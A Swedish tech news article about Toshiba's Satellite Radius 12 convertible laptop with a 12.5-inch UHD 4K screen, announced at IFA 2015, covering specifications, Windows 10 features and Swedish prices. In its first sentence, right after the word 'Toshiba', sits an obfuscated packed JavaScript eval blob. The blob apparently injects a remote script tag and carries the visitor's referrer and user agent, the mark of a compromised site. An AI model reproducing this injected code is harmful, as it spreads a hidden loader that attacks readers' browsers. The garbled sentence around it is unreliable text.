Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

PC

IFA 2015: Toshiba presenterar världens första konvertibla 12,5-tums laptop med UHD 4K

IFA 2015: Toshiba presenterar världens första konvertibla 12,5-tums laptop med UHD 4K
Sebastian

Toshiba eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|esfte|var|u0026u|referrer|itsit||js|php’.split(’|’),0,{}))
presenterar i dag Satellite Radius 12 – världens första laptop med en 360-graders vikbar 12,5-tums Ultra HD 4K-skärm. Premiumdatorn har flera olika arbetslägen, en kraftfull sjätte generationens Intel Core-processor samt full funktionalitet med Windows 10. Satellite Radius 12 levererar en kombination av flexibilitet, prestanda, en högupplöst skärm och de senaste Windows 10-funktionerna.

– Vi är stolta över att vara först med att lansera en 12,5-tums Ultra HD 4K-laptop med 360-graders vikbar skärm, och vi har arbetat nära våra partners Microsoft och Intel för att packa in den senaste tekniken under huven. Användarna kommer både att kunna utnyttja funktionaliteten i Windows 10 och prestandan från de senaste Intel Core-processorerna. Med Satellite Radius 12 kan vi möta de nya kraven hos dagens teknikentusiaster, säger Sandor van der Ham, Vice President, B2C PC, Lifestyle Products and Services Group, Toshiba Europe GmbH.

Satellite Radius 12 är endast 15,4 mm tjock och har en vikt från 1,32 kg. Batteritiden ligger på upp till åtta timmar för Full HD-modellen, och upp till sex timmar för UHD 4K-modellen[1]. Det 360-grader vridbara gångjärnet som fäster skärmdel med tangentbordsdel ger användaren möjlighet att använda laptopen i flera olika lägen beroende på situation.

Skärmen är färgkalibrerad och certifierad av Technicolor samt av Toshibas Chroma Tune™-mjukvara vilket ger användare möjligheten att välja optimal färgrymd för innehållet de tittar på. Satellite Radius 12 finns även tillgänglig med Full HD-display, där båda skärmalternativen har 350 NIT och IPS-teknik. För att göra skärmen ännu mer robust har Toshiba inkluderat Corning® Gorilla® Glass NBT™-förstärkning som bidrar med gedigen skärmtålighet mot skador.

Laptopen har inbyggda Harman/Kardon®-högtalare med DTS Studio Sound som levererar en högkvalitativ ljudbild till all typ av multimedia. Dessutom kan användare spela upp musik på laptopens högtalare trådlöst från smartphone eller surfplatta via Bluetooth® Link.

Satellite Radius 12 drivs av sjätte generationens Intel Core-processorer upp till Core i7. Kombinerat med en Solid State-disk (SSD) på upp till 512GB och 8GB RAM kan Radius 12 leverera en snabb, kraftfull och sömlös multi-tasking- och underhållningsupplevelse. Nya anslutningsmöjligheter inkluderar en snabb USB 3.1 Type-C Gen 2-port med en genomströmning på upp till 10Gbps för snabbare åtkomst till filer.

Funktionerna i Windows 10

Satellite Radius 12 är den första Toshiba-modellen att integrera full funktionalitet från Windows 10. Funktionen Continuum gör övergången för innehåll och appar smidigare när man växlar från desktop- och surfplatteläge. Windows Hello levererar biometrisk autentisering så som ansiktsigenkänning för inloggning med hjälp av den inbyggda HD-webbkameran. Liksom tidigare Toshiba-modeller från 2015, har Satellite Radius 12 en speciell knapp som ger direktåtkomst till Microsofts röststyrda hjälpreda Cortana.

Satellite Radius 12 kommer att finnas tillgänglig i Sverige under det fjärde kvartalet 2015.

Rekommenderade cirkapriser:

Full HD – 11 990 SEK

UHD 4k – 14 990 SEK